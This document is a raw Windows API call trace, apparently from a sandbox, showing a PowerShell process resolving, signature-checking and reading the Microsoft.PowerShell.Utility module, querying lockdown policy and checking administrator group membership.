	[0051.309] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x184c18b710, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71
	[0051.309] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbdc970
	[0051.309] GetSystemDirectoryW (in: lpBuffer=0x1505fbdc970, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0051.309] CoTaskMemFree (pv=0x1505fbdc970) 
	[0051.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18b440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0051.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x184c18b5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c
	[0051.309] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18ba20) returned 1
	[0051.309] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x184c18bb00 | out: lpFileInformation=0x184c18bb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1
	[0051.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b9e0) returned 1
	[0051.309] WldpGetLockdownPolicy () returned 0x0
	[0051.309] GetSystemInfo (in: lpSystemInfo=0x184c18bb60 | out: lpSystemInfo=0x184c18bb60*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0051.309] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18ba68 | out: phkResult=0x184c18ba68*=0x6e0) returned 0x0
	[0051.309] RegQueryValueExW (in: hKey=0x6e0, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184c18bab8, lpData=0x0, lpcbData=0x184c18bab0*=0x0 | out: lpType=0x184c18bab8*=0x0, lpData=0x0, lpcbData=0x184c18bab0*=0x0) returned 0x2
	[0051.310] RegCloseKey (hKey=0x6e0) returned 0x0
	[0051.310] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x184c18b5b0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71
	[0051.310] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18ba40) returned 1
	[0051.310] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x150475c18a0 | out: lpFileInformation=0x150475c18a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1
	[0051.310] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18ba00) returned 1
	[0051.310] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x184c18b570, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71
	[0051.310] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b9b0) returned 1
	[0051.310] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x184c18ba90 | out: lpFileInformation=0x184c18ba90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1
	[0051.310] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b970) returned 1
	[0051.310] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x184c18b520, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71
	[0051.310] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x184c18b380, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71
	[0051.310] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x184c18b450, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71
	[0051.310] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b890) returned 1
	[0051.310] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x184c18b970 | out: lpFileInformation=0x184c18b970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1
	[0051.310] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b850) returned 1
	[0051.310] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x184c18b340, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71
	[0051.311] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b820) returned 1
	[0051.311] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6e0
	[0051.311] GetFileType (hFile=0x6e0) returned 0x1
	[0051.311] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b790) returned 1
	[0051.311] GetFileType (hFile=0x6e0) returned 0x1
	[0051.311] WTGetSignatureInfo () returned 0x0
	[0051.336] CertDuplicateCertificateContext (pCertContext=0x1505fba64a0) returned 0x1505fba64a0
	[0051.336] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18b8b8 | out: phkResult=0x184c18b8b8*=0x704) returned 0x0
	[0051.336] RegQueryValueExW (in: hKey=0x704, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18b908, lpData=0x0, lpcbData=0x184c18b900*=0x0 | out: lpType=0x184c18b908*=0x1, lpData=0x0, lpcbData=0x184c18b900*=0x56) returned 0x0
	[0051.336] RegQueryValueExW (in: hKey=0x704, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18b908, lpData=0x150475c2738, lpcbData=0x184c18b900*=0x56 | out: lpType=0x184c18b908*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184c18b900*=0x56) returned 0x0
	[0051.336] RegCloseKey (hKey=0x704) returned 0x0
	[0051.336] CoTaskMemAlloc (cb=0x10) returned 0x1505fb9b4a0
	[0051.336] CoTaskMemAlloc (cb=0x50) returned 0x1505fab8880
	[0051.336] WinVerifyTrust () returned 0x0
	[0051.337] CoTaskMemFree (pv=0x1505fab8880) 
	[0051.337] CoTaskMemFree (pv=0x1505fb9b4a0) 
	[0051.337] CertFreeCertificateContext (pCertContext=0x1505fba64a0) returned 1
	[0051.337] CloseHandle (hObject=0x6e0) returned 1
	[0051.337] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x184c18b4d0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71
	[0051.337] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b9b0) returned 1
	[0051.337] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6e0
	[0051.337] GetFileType (hFile=0x6e0) returned 0x1
	[0051.337] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b920) returned 1
	[0051.337] GetFileType (hFile=0x6e0) returned 0x1
	[0051.337] SetFilePointer (in: hFile=0x6e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x184c18b968*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184c18b968*=0) returned 0x0
	[0051.337] ReadFile (in: hFile=0x6e0, lpBuffer=0x150475c3978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18b9e8, lpOverlapped=0x0 | out: lpBuffer=0x150475c3978*, lpNumberOfBytesRead=0x184c18b9e8*=0x1000, lpOverlapped=0x0) returned 1
	[0051.338] SetFilePointer (in: hFile=0x6e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x184c18b968*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184c18b968*=0) returned 0x1000
	[0051.338] ReadFile (in: hFile=0x6e0, lpBuffer=0x150475c3978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18b9e8, lpOverlapped=0x0 | out: lpBuffer=0x150475c3978*, lpNumberOfBytesRead=0x184c18b9e8*=0x1000, lpOverlapped=0x0) returned 1
	[0051.338] SetFilePointer (in: hFile=0x6e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x184c18b968*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184c18b968*=0) returned 0x2000
	[0051.338] ReadFile (in: hFile=0x6e0, lpBuffer=0x150475c3978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18b9e8, lpOverlapped=0x0 | out: lpBuffer=0x150475c3978*, lpNumberOfBytesRead=0x184c18b9e8*=0x1000, lpOverlapped=0x0) returned 1
	[0051.338] SetFilePointer (in: hFile=0x6e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x184c18b968*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184c18b968*=0) returned 0x3000
	[0051.338] ReadFile (in: hFile=0x6e0, lpBuffer=0x150475c3978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18b9e8, lpOverlapped=0x0 | out: lpBuffer=0x150475c3978*, lpNumberOfBytesRead=0x184c18b9e8*=0x1000, lpOverlapped=0x0) returned 1
	[0051.338] SetFilePointer (in: hFile=0x6e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x184c18b968*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184c18b968*=0) returned 0x4000
	[0051.338] ReadFile (in: hFile=0x6e0, lpBuffer=0x150475c3978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18b9e8, lpOverlapped=0x0 | out: lpBuffer=0x150475c3978*, lpNumberOfBytesRead=0x184c18b9e8*=0x1000, lpOverlapped=0x0) returned 1
	[0051.339] SetFilePointer (in: hFile=0x6e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x184c18b968*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184c18b968*=0) returned 0x5000
	[0051.339] ReadFile (in: hFile=0x6e0, lpBuffer=0x150475c3978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18b9e8, lpOverlapped=0x0 | out: lpBuffer=0x150475c3978*, lpNumberOfBytesRead=0x184c18b9e8*=0x298, lpOverlapped=0x0) returned 1
	[0051.339] SetFilePointer (in: hFile=0x6e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x184c18b968*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184c18b968*=0) returned 0x5298
	[0051.339] ReadFile (in: hFile=0x6e0, lpBuffer=0x150475c3978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18b9e8, lpOverlapped=0x0 | out: lpBuffer=0x150475c3978*, lpNumberOfBytesRead=0x184c18b9e8*=0x0, lpOverlapped=0x0) returned 1
	[0051.339] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbd9ef0
	[0051.339] GetSystemDirectoryW (in: lpBuffer=0x1505fbd9ef0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0051.339] CoTaskMemFree (pv=0x1505fbd9ef0) 
	[0051.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18b320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0051.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x184c18b4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c
	[0051.339] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b900) returned 1
	[0051.339] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x184c18b9e0 | out: lpFileInformation=0x184c18b9e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1
	[0051.339] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b8c0) returned 1
	[0051.339] WldpGetLockdownPolicy () returned 0x0
	[0051.339] GetSystemInfo (in: lpSystemInfo=0x184c18ba40 | out: lpSystemInfo=0x184c18ba40*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0051.339] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18b948 | out: phkResult=0x184c18b948*=0x6e4) returned 0x0
	[0051.340] RegQueryValueExW (in: hKey=0x6e4, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184c18b998, lpData=0x0, lpcbData=0x184c18b990*=0x0 | out: lpType=0x184c18b998*=0x0, lpData=0x0, lpcbData=0x184c18b990*=0x0) returned 0x2
	[0051.340] RegCloseKey (hKey=0x6e4) returned 0x0
	[0051.340] CloseHandle (hObject=0x6e0) returned 1
	[0051.401] CoCreateGuid (in: pguid=0x184c18bb58 | out: pguid=0x184c18bb58*(Data1=0x5c2e1115, Data2=0x2c44, Data3=0x4e6d, Data4=([0]=0xb6, [1]=0x66, [2]=0xe7, [3]=0xa, [4]=0xbd, [5]=0xf, [6]=0x77, [7]=0x97))) returned 0x0
	[0051.402] GetCurrentProcess () returned 0xffffffffffffffff
	[0051.402] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18ba78 | out: TokenHandle=0x184c18ba78*=0x6e0) returned 1
	[0051.402] GetTokenInformation (in: TokenHandle=0x6e0, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x184c18bb18 | out: TokenInformation=0x0, ReturnLength=0x184c18bb18) returned 0
	[0051.402] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1505fbddd60
	[0051.402] GetTokenInformation (in: TokenHandle=0x6e0, TokenInformationClass=0x8, TokenInformation=0x1505fbddd60, TokenInformationLength=0x4, ReturnLength=0x184c18bb18 | out: TokenInformation=0x1505fbddd60, ReturnLength=0x184c18bb18) returned 1
	[0051.402] LocalFree (hMem=0x1505fbddd60) returned 0x0
	[0051.402] DuplicateTokenEx (in: hExistingToken=0x6e0, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x184c18bb78 | out: phNewToken=0x184c18bb78*=0x6e4) returned 1
	[0051.402] CheckTokenMembership (in: TokenHandle=0x6e4, SidToCheck=0x150476bf2f8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x184c18bb80 | out: IsMember=0x184c18bb80) returned 1
	[0051.402] CloseHandle (hObject=0x6e4) returned 1
	[0051.406] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x184c18b250, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71
	[0051.406] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x184c18b1c0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71
	[0051.406] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b600) returned 1
	[0051.406] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x184c18b6e0 | out: lpFileInformation=0x184c18b6e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1
	[0051.406] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b5c0) returned 1
	[0051.406] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x184c18b170, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71
	[0051.406] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x184c18afd0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71
	[0051.406] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x184c18b0a0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71
	[0051.407] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b4e0) returned 1
	[0051.407] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x184c18b5c0 | out: lpFileInformation=0x184c18b5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1
	[0051.407] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b4a0) returned 1
	[0051.407] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x184c18af90, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71
	[0051.407] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b470) returned 1
	[0051.407] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6e4
	[0051.407] GetFileType (hFile=0x6e4) returned 0x1
	[0051.407] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b3e0) returned 1
	[0051.407] GetFileType (hFile=0x6e4) returned 0x1
	[0051.407] WTGetSignatureInfo () returned 0x0
	[0051.423] CertDuplicateCertificateContext (pCertContext=0x1505fba71a0) returned 0x1505fba71a0
	[0051.424] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18b508 | out: phkResult=0x184c18b508*=0x6ec) returned 0x0
	[0051.424] RegQueryValueExW (in: hKey=0x6ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18b558, lpData=0x0, lpcbData=0x184c18b550*=0x0 | out: lpType=0x184c18b558*=0x1, lpData=0x0, lpcbData=0x184c18b550*=0x56) returned 0x0
	[0051.424] RegQueryValueExW (in: hKey=0x6ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x184c18b558, lpData=0x150476e3fc8, lpcbData=0x184c18b550*=0x56 | out: lpType=0x184c18b558*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x184c18b550*=0x56) returned 0x0
	[0051.424] RegCloseKey (hKey=0x6ec) returned 0x0
	[0051.424] CoTaskMemAlloc (cb=0x10) returned 0x1505fb9b160
	[0051.424] CoTaskMemAlloc (cb=0x50) returned 0x1505fab7560
	[0051.424] WinVerifyTrust () returned 0x0
	[0051.425] CoTaskMemFree (pv=0x1505fab7560) 
	[0051.425] CoTaskMemFree (pv=0x1505fb9b160) 
	[0051.425] CertFreeCertificateContext (pCertContext=0x1505fba71a0) returned 1
	[0051.425] CloseHandle (hObject=0x6e4) returned 1
	[0051.425] CoCreateGuid (in: pguid=0x184c18b4d8 | out: pguid=0x184c18b4d8*(Data1=0xedeba84c, Data2=0x194a, Data3=0x4583, Data4=([0]=0xba, [1]=0xbb, [2]=0x32, [3]=0xc9, [4]=0x56, [5]=0x43, [6]=0x2f, [7]=0x61))) returned 0x0
	[0051.530] CoCreateGuid (in: pguid=0x184c18b4d8 | out: pguid=0x184c18b4d8*(Data1=0xb0865fd3, Data2=0x5310, Data3=0x443a, Data4=([0]=0xa8, [1]=0x33, [2]=0xf8, [3]=0x82, [4]=0x54, [5]=0xb9, [6]=0xe4, [7]=0xe6))) returned 0x0
	[0051.530] CoCreateGuid (in: pguid=0x184c18b4d8 | out: pguid=0x184c18b4d8*(Data1=0x674a29b0, Data2=0xad6f, Data3=0x4fd3, Data4=([0]=0xaf, [1]=0xd1, [2]=0x78, [3]=0x33, [4]=0x6d, [5]=0xd, [6]=0x79, [7]=0xb5))) returned 0x0
	[0051.615] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1505f4336a0
	[0051.638] CoCreateGuid (in: pguid=0x184c18b4d8 | out: pguid=0x184c18b4d8*(Data1=0xd68c5308, Data2=0x52af, Data3=0x482e, Data4=([0]=0x85, [1]=0xbd, [2]=0x1c, [3]=0x77, [4]=0xfe, [5]=0x87, [6]=0xc8, [7]=0x65))) returned 0x0
